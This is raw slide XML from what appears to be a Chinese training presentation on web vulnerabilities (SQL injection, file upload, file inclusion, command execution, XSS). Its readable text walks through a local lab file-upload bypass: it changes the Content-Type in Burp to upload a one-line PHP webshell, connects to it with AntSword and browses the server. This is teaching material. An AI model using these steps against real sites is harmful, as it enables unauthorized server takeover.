            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:solidFill>
                <a:srgbClr val="019F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5" name="矩形 4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2798" y="3829"/>
              <a:ext cx="1087" cy="1087"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:gradFill>
              <a:gsLst>
                <a:gs pos="0">
                  <a:srgbClr val="019FE1"/>
                </a:gs>
                <a:gs pos="90000">
                  <a:srgbClr val="02174E">
                    <a:alpha val="0"/>
                  </a:srgbClr>
                </a:gs>
              </a:gsLst>
              <a:path path="circle">
                <a:fillToRect l="50000" t="50000" r="50000" b="50000"/>
              </a:path>
            </a:gradFill>
            <a:ln>
              <a:solidFill>
                <a:srgbClr val="019F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 name="文本框 5"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4579" y="4011"/>
              <a:ext cx="4573" cy="725"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN"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sql</a:t>
              </a:r>
              <a:r>
                <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注入漏洞</a:t>
              </a:r>
              <a:endPar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endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="文本框 6"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2827" y="3963"/>
              <a:ext cx="1030" cy="822"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="dist"/>
              <a:r>
                <a:rPr lang="en-US" sz="2800" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="思源黑体 Bold" panose="020B0800000000000000" charset="-122"/>
                  <a:ea typeface="思源黑体 Bold" panose="020B0800000000000000" charset="-122"/>
                  <a:cs typeface="思源黑体 Medium" panose="020B0600000000000000" charset="-122"/>
                </a:rPr>
                <a:t>01</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="28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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="20" name="组合 19"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3444875" y="2667634"/>
            <a:ext cx="4384675" cy="690880"/>
            <a:chOff x="2798" y="3829"/>
            <a:chExt cx="6905" cy="1088"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="23" name="矩形 22"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4028" y="3829"/>
              <a:ext cx="5675" cy="1088"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:solidFill>
                <a:srgbClr val="019F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24" name="矩形 23"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2798" y="3829"/>
              <a:ext cx="1087" cy="1087"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:gradFill>
              <a:gsLst>
                <a:gs pos="0">
                  <a:srgbClr val="019FE1"/>
                </a:gs>
                <a:gs pos="90000">
                  <a:srgbClr val="02174E">
                    <a:alpha val="0"/>
                  </a:srgbClr>
                </a:gs>
              </a:gsLst>
              <a:path path="circle">
                <a:fillToRect l="50000" t="50000" r="50000" b="50000"/>
              </a:path>
            </a:gradFill>
            <a:ln>
              <a:solidFill>
                <a:srgbClr val="019F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25" name="文本框 24"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4579" y="4011"/>
              <a:ext cx="4573" cy="725"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <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文件</a:t>
              </a:r>
              <a:r>
                <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上传漏洞</a:t>
              </a:r>
              <a:endPar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endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="26" name="文本框 25"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2827" y="3963"/>
              <a:ext cx="1030" cy="822"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="dist"/>
              <a:r>
                <a:rPr lang="en-US" sz="2800" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="思源黑体 Bold" panose="020B0800000000000000" charset="-122"/>
                  <a:ea typeface="思源黑体 Bold" panose="020B0800000000000000" charset="-122"/>
                  <a:cs typeface="思源黑体 Medium" panose="020B0600000000000000" charset="-122"/>
                </a:rPr>
                <a:t>02</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="28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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="28" name="组合 27"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3445510" y="3487103"/>
            <a:ext cx="4384675" cy="690880"/>
            <a:chOff x="2798" y="3829"/>
            <a:chExt cx="6905" cy="1088"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="45" name="矩形 44"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4028" y="3829"/>
              <a:ext cx="5675" cy="1088"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:solidFill>
                <a:srgbClr val="019F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2" name="矩形 61"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2798" y="3829"/>
              <a:ext cx="1087" cy="1087"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:gradFill>
              <a:gsLst>
                <a:gs pos="0">
                  <a:srgbClr val="019FE1"/>
                </a:gs>
                <a:gs pos="90000">
                  <a:srgbClr val="02174E">
                    <a:alpha val="0"/>
                  </a:srgbClr>
                </a:gs>
              </a:gsLst>
              <a:path path="circle">
                <a:fillToRect l="50000" t="50000" r="50000" b="50000"/>
              </a:path>
            </a:gradFill>
            <a:ln>
              <a:solidFill>
                <a:srgbClr val="019F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3" name="文本框 62"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4579" y="4011"/>
              <a:ext cx="4573" cy="725"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <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文件</a:t>
              </a:r>
              <a:r>
                <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包含漏洞</a:t>
              </a:r>
              <a:endPar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endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="64" name="文本框 63"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2827" y="3963"/>
              <a:ext cx="1030" cy="822"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="dist"/>
              <a:r>
                <a:rPr lang="en-US" sz="2800" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="思源黑体 Bold" panose="020B0800000000000000" charset="-122"/>
                  <a:ea typeface="思源黑体 Bold" panose="020B0800000000000000" charset="-122"/>
                  <a:cs typeface="思源黑体 Medium" panose="020B0600000000000000" charset="-122"/>
                </a:rPr>
                <a:t>03</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="28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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="65" name="组合 64"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3444875" y="4349432"/>
            <a:ext cx="4384675" cy="690880"/>
            <a:chOff x="2798" y="3829"/>
            <a:chExt cx="6905" cy="1088"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="66" name="矩形 65"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4028" y="3829"/>
              <a:ext cx="5675" cy="1088"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:solidFill>
                <a:srgbClr val="019F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7" name="矩形 66"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2798" y="3829"/>
              <a:ext cx="1087" cy="1087"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:gradFill>
              <a:gsLst>
                <a:gs pos="0">
                  <a:srgbClr val="019FE1"/>
                </a:gs>
                <a:gs pos="90000">
                  <a:srgbClr val="02174E">
                    <a:alpha val="0"/>
                  </a:srgbClr>
                </a:gs>
              </a:gsLst>
              <a:path path="circle">
                <a:fillToRect l="50000" t="50000" r="50000" b="50000"/>
              </a:path>
            </a:gradFill>
            <a:ln>
              <a:solidFill>
                <a:srgbClr val="019F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8" name="文本框 67"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4325" y="4009"/>
              <a:ext cx="5330" cy="725"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <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命令</a:t>
              </a:r>
              <a:r>
                <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执行漏洞</a:t>
              </a:r>
              <a:endPar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endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="69" name="文本框 68"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2827" y="3963"/>
              <a:ext cx="1030" cy="822"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="dist"/>
              <a:r>
                <a:rPr lang="en-US" sz="2800" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="思源黑体 Bold" panose="020B0800000000000000" charset="-122"/>
                  <a:ea typeface="思源黑体 Bold" panose="020B0800000000000000" charset="-122"/>
                  <a:cs typeface="思源黑体 Medium" panose="020B0600000000000000" charset="-122"/>
                </a:rPr>
                <a:t>04</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="28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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="8" name="组合 7"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3444875" y="5171122"/>
            <a:ext cx="4384675" cy="690880"/>
            <a:chOff x="2798" y="3829"/>
            <a:chExt cx="6905" cy="1088"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形 8"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4028" y="3829"/>
              <a:ext cx="5675" cy="1088"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:solidFill>
                <a:srgbClr val="019F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Medium" panose="020B0600000000000000" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="矩形 9"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2798" y="3829"/>
              <a:ext cx="1087" cy="1087"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:gradFill>
              <a:gsLst>
                <a:gs pos="0">
                  <a:srgbClr val="019FE1"/>
                </a:gs>
                <a:gs pos="90000">
                  <a:srgbClr val="02174E">
                    <a:alpha val="0"/>
                  </a:srgbClr>
                </a:gs>
              </a:gsLst>
              <a:path path="circle">
                <a:fillToRect l="50000" t="50000" r="50000" b="50000"/>
              </a:path>
            </a:gradFill>
            <a:ln>
              <a:solidFill>
                <a:srgbClr val="019F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Medium" panose="020B0600000000000000" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="文本框 10"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4325" y="4009"/>
              <a:ext cx="5330" cy="725"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="zh-CN"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反射型</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN"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xss</a:t>
              </a:r>
              <a:r>
                <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漏洞</a:t>
              </a:r>
              <a:r>
                <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rPr>
                <a:t>复现</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="100000">
                      <a:srgbClr val="019FE1"/>
                    </a:gs>
                    <a:gs pos="0">
                      <a:schemeClr val="bg1"/>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="5400000" scaled="0"/>
                </a:gradFill>
                <a:latin typeface="思源黑体 Bold" panose="020B0800000000000000" charset="-122"/>
                <a:ea typeface="思源黑体 Bold" panose="020B0800000000000000" charset="-122"/>
                <a:cs typeface="思源黑体 Medium" panose="020B0600000000000000" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="文本框 11"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2827" y="3963"/>
              <a:ext cx="1030" cy="822"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:p>
              <a:pPr algn="dist"/>
              <a:r>
                <a:rPr lang="en-US" sz="2800" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="思源黑体 Bold" panose="020B0800000000000000" charset="-122"/>
                  <a:ea typeface="思源黑体 Bold" panose="020B0800000000000000" charset="-122"/>
                  <a:cs typeface="思源黑体 Medium" panose="020B0600000000000000" charset="-122"/>
                </a:rPr>
                <a:t>05</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="28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1070610" y="1783080"/>
            <a:ext cx="8202930" cy="706755"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>尝试绕过文件类型名，可以通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>burp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>抓包修改后缀，从而实现上传恶意文件的目的，我们直接上传一句话木马</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>，抓取</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>数据包</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2392680" y="2546350"/>
            <a:ext cx="7103745" cy="403415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3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1040765" y="1706245"/>
            <a:ext cx="10001250" cy="706755"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>看到默认</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>type</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>类型是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>application/octer-stream</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>，修改其为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>image/png</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>，放包，上传成功了，还获得了文件上传的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>路径</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="图片 7"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2747010" y="3429000"/>
            <a:ext cx="6696710" cy="3122930"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="图片 8"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2642870" y="2493645"/>
            <a:ext cx="6905625" cy="70485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1070610" y="1783080"/>
            <a:ext cx="8202930" cy="1014730"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>在知道上传文件的具体路径后，使用蚁剑工具进行远程连接木马文件，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>url: http://127.0.0.1:8898/hackable/uploads/1.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>，看到成功</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>连接</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2463800" y="2788920"/>
            <a:ext cx="6557645" cy="3907790"/>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635"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1070610" y="1783080"/>
            <a:ext cx="8202930" cy="398780"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>添加数据即可查看网站的目录及其相关</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>内容</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1905000" y="2339340"/>
            <a:ext cx="8190865" cy="373316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635"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5</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、漏洞源码</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分析</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pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1047750" y="1854200"/>
            <a:ext cx="5638165" cy="4369435"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7285355" y="1931035"/>
            <a:ext cx="4064000" cy="3784600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>可以看到，服务器只对上传文件的大小和类型做了限制：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>文件大小：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>100000B</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
